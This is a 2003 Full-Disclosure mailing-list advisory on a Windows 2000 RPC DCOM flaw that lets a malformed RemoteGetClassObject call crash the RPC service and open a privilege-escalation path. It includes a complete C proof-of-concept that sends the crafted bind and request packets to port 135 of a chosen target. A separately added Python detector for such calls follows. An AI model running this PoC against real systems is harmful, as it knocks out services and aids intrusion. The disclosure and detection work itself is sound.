Full Disclosure mailing list archives
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability
From: "benjurry" <benjurry () xfocus org>
Date: Mon, 21 Jul 2003 23:53:03 +0800
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

1. Description:

There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results from incorrect handling of malformed messages. By sending a message to the DCOM __RemoteGetClassObject interface, the RPC service will crash, and all services and applications depending on the RPC service will behave abnormally. The reason for this is that the __RemoteGetClassObject interface passes a NULL pointer to the PerformScmStage function. If the attacker has an account, he can hijack the epmapper pipe and port 135 for privilege escalation after the RPC service has crashed.

2. Affected Systems:

Windows 2000 + SP3
Windows 2000 + SP4 + MS03-026 HotFix

3. Proof of concept code:

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

/* DCE/RPC bind PDU as posted by the author */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

/* DCE/RPC request PDU as posted by the author */
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

int main(int argc,char ** argv)
{
    WSADATA WSAData;
    int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];

    printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
    printf("Code by FlashSky,Flashsky () xfocus org,benjurry,benjurry () xfocus org\n");
    printf("Welcome to http://www.xfocus.net\n");

    if(argc<2)
    {
        printf("useage:%s target\n",argv[0]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return 1;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return 1;
    }

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return 1;
    }

    /* bind, then peek at the bind_ack */
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    i=recv(sock,buf1,1024,MSG_PEEK);

    /* request, then peek at whatever comes back */
    if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    i=recv(sock,buf1,1024,MSG_PEEK);

    return 0;
}

4. Author: flashsky () xfocus org
e-mail: fangxing () venustech com cn
flashsky () xfocus org

Thanks Benjerry () xfocus org for testing and translation.

Welcome to visit our web site:
http://www.xfocus.org
http://www.venustech.com.cn

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
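As an added, defender-side example that is not part of the original post or of the authors' code: a small parser for the DCE/RPC connection-oriented bind and request PDUs the advisory describes. It walks the PDUs of one TCP connection to port 135, records which context id was bound to which interface UUID, and raises an alert when a request calls opnum 3 (RemoteGetClassObject) on the IRemoteSCMActivator interface, UUID 000001A0-0000-0000-C000-000000000046, which is the interface and opnum the posted bind and request PDUs carry. It also flags a frag_length that disagrees with the bytes actually seen. The sample PDUs are constructed inside the block with an all-zero stub for test input; they are not the payload from the post. All function and variable names are my own.

```python
import struct
import uuid
from typing import Dict, Iterable, List

# Interface and method named in the advisory above: the DCOM activation interface
# IRemoteSCMActivator and its RemoteGetClassObject method (opnum 3 on that interface).
IREMOTESCMACTIVATOR = uuid.UUID("000001a0-0000-0000-c000-000000000046")
REMOTEGETCLASSOBJECT_OPNUM = 3
# Standard NDR transfer syntax, version 2 (used when constructing sample bind PDUs).
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")

PTYPE_REQUEST = 0
PTYPE_BIND = 11


def parse_header(pdu: bytes) -> dict:
    """Parse the 16-byte DCE/RPC connection-oriented common header."""
    if len(pdu) < 16:
        raise ValueError("PDU shorter than the 16-byte common header")
    ver, ptype, flags = pdu[0], pdu[2], pdu[3]
    if ver != 5:
        raise ValueError("unsupported DCE/RPC major version %d" % ver)
    # Data representation byte 4: high nibble 0x1 marks little-endian integers.
    endian = "<" if (pdu[4] & 0xF0) == 0x10 else ">"
    frag_len, auth_len, call_id = struct.unpack(endian + "HHI", pdu[8:16])
    return {"ptype": ptype, "flags": flags, "endian": endian,
            "frag_len": frag_len, "auth_len": auth_len, "call_id": call_id}


def parse_bind(pdu: bytes) -> Dict[int, uuid.UUID]:
    """Return {context_id: abstract_syntax_uuid} for every context in a bind PDU."""
    hdr = parse_header(pdu)
    if hdr["ptype"] != PTYPE_BIND:
        raise ValueError("not a bind PDU")
    e = hdr["endian"]
    n_ctx = pdu[24]          # after max_xmit, max_recv and assoc_group
    off = 28                 # n_context_elem plus three reserved bytes
    contexts = {}
    for _ in range(n_ctx):
        ctx_id, n_transfer = struct.unpack(e + "HBx", pdu[off:off + 4])
        contexts[ctx_id] = uuid.UUID(bytes_le=pdu[off + 4:off + 20])  # NDR UUIDs are little-endian
        off += 4 + 20 + 20 * n_transfer   # abstract syntax and each transfer syntax are 20 bytes
    return contexts


def parse_request(pdu: bytes) -> dict:
    """Return header fields plus alloc_hint, context id, opnum and stub bytes of a request PDU."""
    hdr = parse_header(pdu)
    if hdr["ptype"] != PTYPE_REQUEST:
        raise ValueError("not a request PDU")
    alloc_hint, ctx_id, opnum = struct.unpack(hdr["endian"] + "IHH", pdu[16:24])
    # An auth trailer, when present, is auth_len bytes plus an 8-byte auth verifier header.
    stub_end = len(pdu) - (hdr["auth_len"] + 8 if hdr["auth_len"] else 0)
    return dict(hdr, alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum, stub=pdu[24:stub_end])


def inspect_stream(pdus: Iterable[bytes]) -> List[str]:
    """Walk the PDUs of one connection to port 135 and return human-readable alerts."""
    alerts = []
    contexts: Dict[int, uuid.UUID] = {}
    for pdu in pdus:
        hdr = parse_header(pdu)
        if hdr["frag_len"] != len(pdu):
            alerts.append("call %d: frag_length %d does not match %d bytes on the wire"
                          % (hdr["call_id"], hdr["frag_len"], len(pdu)))
        if hdr["ptype"] == PTYPE_BIND:
            contexts.update(parse_bind(pdu))
        elif hdr["ptype"] == PTYPE_REQUEST:
            req = parse_request(pdu)
            if (contexts.get(req["ctx_id"]) == IREMOTESCMACTIVATOR
                    and req["opnum"] == REMOTEGETCLASSOBJECT_OPNUM):
                alerts.append("call %d: RemoteGetClassObject on IRemoteSCMActivator, %d-byte stub"
                              % (req["call_id"], len(req["stub"])))
    return alerts


def _header(ptype: int, call_id: int, body_len: int) -> bytes:
    # Version 5.0, flags first|last (0x03), little-endian NDR data representation.
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, 0x03, b"\x10\x00\x00\x00", 16 + body_len, 0, call_id)


def build_bind(ctx_id: int, abstract: uuid.UUID, call_id: int = 1) -> bytes:
    """Constructed bind PDU with one context and the NDR transfer syntax (test input only)."""
    body = struct.pack("<HHIBxxx", 5840, 5840, 0, 1)
    body += struct.pack("<HBx", ctx_id, 1) + abstract.bytes_le + struct.pack("<I", 0)
    body += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)
    return _header(PTYPE_BIND, call_id, len(body)) + body


def build_request(ctx_id: int, opnum: int, stub: bytes, call_id: int = 2) -> bytes:
    """Constructed request PDU carrying the given stub (test input only)."""
    body = struct.pack("<IHH", len(stub), ctx_id, opnum) + stub
    return _header(PTYPE_REQUEST, call_id, len(body)) + body


if __name__ == "__main__":
    # Constructed sample: bind to IRemoteSCMActivator, then an opnum-3 request
    # with an all-zero 48-byte stub. This is not the payload from the post.
    stream = [build_bind(1, IREMOTESCMACTIVATOR),
              build_request(1, REMOTEGETCLASSOBJECT_OPNUM, b"\x00" * 48)]
    for alert in inspect_stream(stream):
        print("ALERT:", alert)
```

The parser keys on the bind context rather than on fixed byte offsets in the request, so a client that negotiates several contexts or uses a context id other than 1 is still matched. In a real sensor the same logic would run per TCP stream, and an alert from a host that has no business calling DCOM activation on a domain controller or server is the signal worth escalating.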